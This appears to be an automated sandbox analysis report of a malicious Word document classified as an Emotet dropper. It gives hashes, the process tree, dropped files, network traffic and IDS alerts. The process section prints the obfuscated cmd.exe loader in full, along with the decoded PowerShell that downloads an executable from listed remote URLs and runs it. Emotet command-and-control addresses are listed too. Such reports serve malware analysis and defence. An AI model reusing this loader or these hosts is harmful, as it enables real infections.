File name: | 083c98febf67f310ab6c42b03e20ff98902cb29df9ff1d8e522fe6f3c473ed78 |
Full analysis: | https://app.any.run/tasks/9feaa9a9-03f2-411c-83a7-88d643bb5e23 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 14, 2018, 09:04:49 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Fri Dec 14 04:03:00 2018, Last Saved Time/Date: Fri Dec 14 04:03:00 2018, Number of Pages: 1, Number of Words: 4, Number of Characters: 26, Security: 0 |
MD5: | 8E7E5435909B747356B76E03C0C1EB5B |
SHA1: | A61320BAF0AC6EDAD5702660A1EC9FEA2DE42E11 |
SHA256: | 083C98FEBF67F310AB6C42B03E20FF98902CB29DF9FF1D8E522FE6F3C473ED78 |
SSDEEP: | 1536:r7ljmW9/bvF292zDL3021fJ7XdUrnYJ3Nuw/+a9:nl/bvFo2QQfJjdUrnQ9u |
.doc | | | Microsoft Word document (54.2) |
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:14 04:03:00 |
ModifyDate: | 2018:12:14 04:03:00 |
Pages: | 1 |
Words: | 4 |
Characters: | 26 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 29 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: | |
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2948 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\083c98febf67f310ab6c42b03e20ff98902cb29df9ff1d8e522fe6f3c473ed78.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4052 | c:\nYwjQcmSnzqz\oPirlnKKhU\rMzdQJEih\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set AG=QtFwnzQYJacnribwCcHbmDpEAnUVF T.4shX+@S;e9/Z'}lvW(8dO-y\G{uj3gxfK$N0)=o:,Ik5&&for %I in (65,1,33,52,69,44,22,73,58,44,39,65,25,20,34,69,25,40,15,53,70,19,59,40,17,1,29,66,40,1,31,48,40,19,16,46,13,40,25,1,39,65,66,34,26,69,44,34,1,1,22,71,42,42,17,13,22,12,13,9,1,13,31,17,70,31,58,74,42,15,41,37,34,1,1,22,71,42,42,9,25,61,58,46,46,9,12,31,17,70,20,31,19,12,42,8,75,52,43,8,37,34,1,1,22,71,42,42,17,58,19,40,31,59,70,19,58,12,61,42,34,37,34,1,1,22,71,42,42,61,40,25,1,40,33,9,25,46,58,13,33,31,17,70,20,42,25,51,75,26,51,58,60,37,34,1,1,22,71,42,42,19,9,33,13,17,74,13,31,17,70,20,42,22,32,20,46,35,66,1,33,44,31,38,22,46,13,1,49,44,37,44,68,39,65,52,38,20,69,44,24,66,18,44,39,65,17,58,74,29,69,29,44,41,60,32,44,39,65,21,27,34,69,44,33,19,5,44,39,65,64,51,38,69,65,40,25,47,71,1,40,20,22,36,44,55,44,36,65,17,58,74,36,44,31,40,62,40,44,39,63,70,12,40,9,17,34,49,65,56,20,63,29,13,25,29,65,66,34,26,68,57,1,12,54,57,65,25,20,34,31,21,70,15,25,46,70,9,51,28,13,46,40,49,65,56,20,63,72,29,65,64,51,38,68,39,65,21,56,15,69,44,30,6,18,44,39,73,63,29,49,49,56,40,1,53,73,1,40,20,29,65,64,51,38,68,31,46,40,25,61,1,34,29,53,61,40,29,50,67,67,67,67,68,29,57,73,25,47,70,74,40,53,73,1,40,20,29,65,64,51,38,39,65,9,16,58,69,44,51,7,23,44,39,19,12,40,9,74,39,45,45,17,9,1,17,34,57,45,45,65,25,15,70,69,44,46,63,15,44,39,85)do set lQ6=!lQ6!!AG:~%I,1!&&if %I==85 echo !lQ6:~-421!|FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1')DO %d -" | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2612 | CmD /V:O/C"set AG=QtFwnzQYJacnribwCcHbmDpEAnUVF T.4shX+@S;e9/Z'}lvW(8dO-y\G{uj3gxfK$N0)=o:,Ik5&&for %I in (65,1,33,52,69,44,22,73,58,44,39,65,25,20,34,69,25,40,15,53,70,19,59,40,17,1,29,66,40,1,31,48,40,19,16,46,13,40,25,1,39,65,66,34,26,69,44,34,1,1,22,71,42,42,17,13,22,12,13,9,1,13,31,17,70,31,58,74,42,15,41,37,34,1,1,22,71,42,42,9,25,61,58,46,46,9,12,31,17,70,20,31,19,12,42,8,75,52,43,8,37,34,1,1,22,71,42,42,17,58,19,40,31,59,70,19,58,12,61,42,34,37,34,1,1,22,71,42,42,61,40,25,1,40,33,9,25,46,58,13,33,31,17,70,20,42,25,51,75,26,51,58,60,37,34,1,1,22,71,42,42,19,9,33,13,17,74,13,31,17,70,20,42,22,32,20,46,35,66,1,33,44,31,38,22,46,13,1,49,44,37,44,68,39,65,52,38,20,69,44,24,66,18,44,39,65,17,58,74,29,69,29,44,41,60,32,44,39,65,21,27,34,69,44,33,19,5,44,39,65,64,51,38,69,65,40,25,47,71,1,40,20,22,36,44,55,44,36,65,17,58,74,36,44,31,40,62,40,44,39,63,70,12,40,9,17,34,49,65,56,20,63,29,13,25,29,65,66,34,26,68,57,1,12,54,57,65,25,20,34,31,21,70,15,25,46,70,9,51,28,13,46,40,49,65,56,20,63,72,29,65,64,51,38,68,39,65,21,56,15,69,44,30,6,18,44,39,73,63,29,49,49,56,40,1,53,73,1,40,20,29,65,64,51,38,68,31,46,40,25,61,1,34,29,53,61,40,29,50,67,67,67,67,68,29,57,73,25,47,70,74,40,53,73,1,40,20,29,65,64,51,38,39,65,9,16,58,69,44,51,7,23,44,39,19,12,40,9,74,39,45,45,17,9,1,17,34,57,45,45,65,25,15,70,69,44,46,63,15,44,39,85)do set lQ6=!lQ6!!AG:~%I,1!&&if %I==85 echo !lQ6:~-421!|FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1')DO %d -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2700 | C:\Windows\system32\cmd.exe /S /D /c" echo $tsO='pIu';$nmh=new-object Net.WebClient;$NhU='http://cipriati.co.uk/w9@http://angullar.com.br/J5OZJ@http://cube.joburg/h@http://gentesanluis.com/nd5Udu3@http://basicki.com/p4mlXNts'.Split('@');$OSm='ANH';$cuk = '934';$DVh='sbz';$KdS=$env:temp+'\'+$cuk+'.exe';foreach($Gmf in $NhU){try{$nmh.DownloadFile($Gmf, $KdS);$DGw='TQH';If ((Get-Item $KdS).length -ge 80000) {Invoke-Item $KdS;$aCu='dYE';break;}}catch{}}$nwo='lfw';" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
2768 | C:\Windows\system32\cmd.exe /S /D /c" FOR /F "delims=.VXC46 tokens=2" %d IN ('assoc.psc1') DO %d -" | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3136 | C:\Windows\system32\cmd.exe /c assoc.psc1 | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3460 | PowerShell - | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2996 | "C:\Users\admin\AppData\Local\Temp\934.exe" | C:\Users\admin\AppData\Local\Temp\934.exe | — | powershell.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
3836 | "C:\Users\admin\AppData\Local\Temp\934.exe" | C:\Users\admin\AppData\Local\Temp\934.exe | — | 934.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
3548 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 934.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: ODBC (3.0) driver for DBase Exit code: 0 Version: 4.0.6304.0 | ||||
PID | Process | Filename | Type | |
---|---|---|---|---|
2948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR6A05.tmp.cvr | — | |
MD5:— | SHA256:— | |||
2948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C408A7CC.wmf | — | |
MD5:— | SHA256:— | |||
2948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\8EBD7BBA.wmf | — | |
MD5:— | SHA256:— | |||
3460 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\FNBIBBSVWV14KM165NHL.temp | — | |
MD5:— | SHA256:— | |||
2948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\FF6E737.wmf | wmf | |
MD5:86615E1F8604036617AD3B59D748D666 | SHA256:167AF41799A5E7C3726DF24FE901C74436B265C003A146A3E98BB459B8BAAB6F | |||
3460 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
3460 | powershell.exe | C:\Users\admin\AppData\Local\Temp\934.exe | executable | |
MD5:1DBF8DD1593C49989527543036A58CDE | SHA256:C9BA0C6EA2D8B5B9DB22F090BC926D3F2D8FCEFDAB57D49353FE05579200C1BF | |||
2948 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CA37CD5D.wmf | wmf | |
MD5:17EB758CB8C1E36D50C52287DCB802DD | SHA256:E631DB9F8CEF71028DE12EE5C000632C9A0412AD3A0143FE75EDC1C5397954CB | |||
2948 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:5E2041FDA144453159427A44F1671FF2 | SHA256:DADC67B011C595DC89FECEA682D77EFF235948180174F716411FB54E49BF309A | |||
3460 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF247976.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2200 | archivesymbol.exe | GET | — | 189.154.39.153:443 | http://189.154.39.153:443/ | MX | — | — | malicious |
3460 | powershell.exe | GET | 200 | 212.227.94.120:80 | http://cipriati.co.uk/w9/ | DE | executable | 120 Kb | malicious |
2200 | archivesymbol.exe | GET | — | 186.136.68.246:80 | http://186.136.68.246/ | AR | — | — | malicious |
2200 | archivesymbol.exe | GET | — | 189.180.237.144:7080 | http://189.180.237.144:7080/ | MX | — | — | malicious |
2200 | archivesymbol.exe | GET | — | 201.111.83.186:8080 | http://201.111.83.186:8080/ | MX | — | — | malicious |
3460 | powershell.exe | GET | 301 | 212.227.94.120:80 | http://cipriati.co.uk/w9 | DE | html | 297 b | malicious |
2200 | archivesymbol.exe | GET | 200 | 86.98.66.88:990 | http://86.98.66.88:990/ | AE | binary | 132 b | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
2200 | archivesymbol.exe | 186.136.68.246:80 | — | Prima S.A. | AR | malicious |
3460 | powershell.exe | 212.227.94.120:80 | cipriati.co.uk | 1&1 Internet SE | DE | suspicious |
2200 | archivesymbol.exe | 201.111.83.186:8080 | — | Uninet S.A. de C.V. | MX | malicious |
2200 | archivesymbol.exe | 189.180.237.144:7080 | — | Uninet S.A. de C.V. | MX | malicious |
2200 | archivesymbol.exe | 189.154.39.153:443 | — | Uninet S.A. de C.V. | MX | malicious |
2200 | archivesymbol.exe | 86.98.66.88:990 | — | Emirates Telecommunications Corporation | AE | suspicious |
Domain | IP | Reputation |
---|---|---|
cipriati.co.uk | | malicious |
PID | Process | Class | Message |
---|---|---|---|
3460 | powershell.exe | A Network Trojan was detected | SC TROJAN_DOWNLOADER Suspicious loader with tiny header |
3460 | powershell.exe | A Network Trojan was detected | ET POLICY Terse Named Filename EXE Download - Possibly Hostile |
3460 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3460 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3460 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |
2200 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2200 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2200 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |
2200 | archivesymbol.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo HTTP request |
2200 | archivesymbol.exe | A Network Trojan was detected | SC SPYWARE Spyware Emotet Win32 |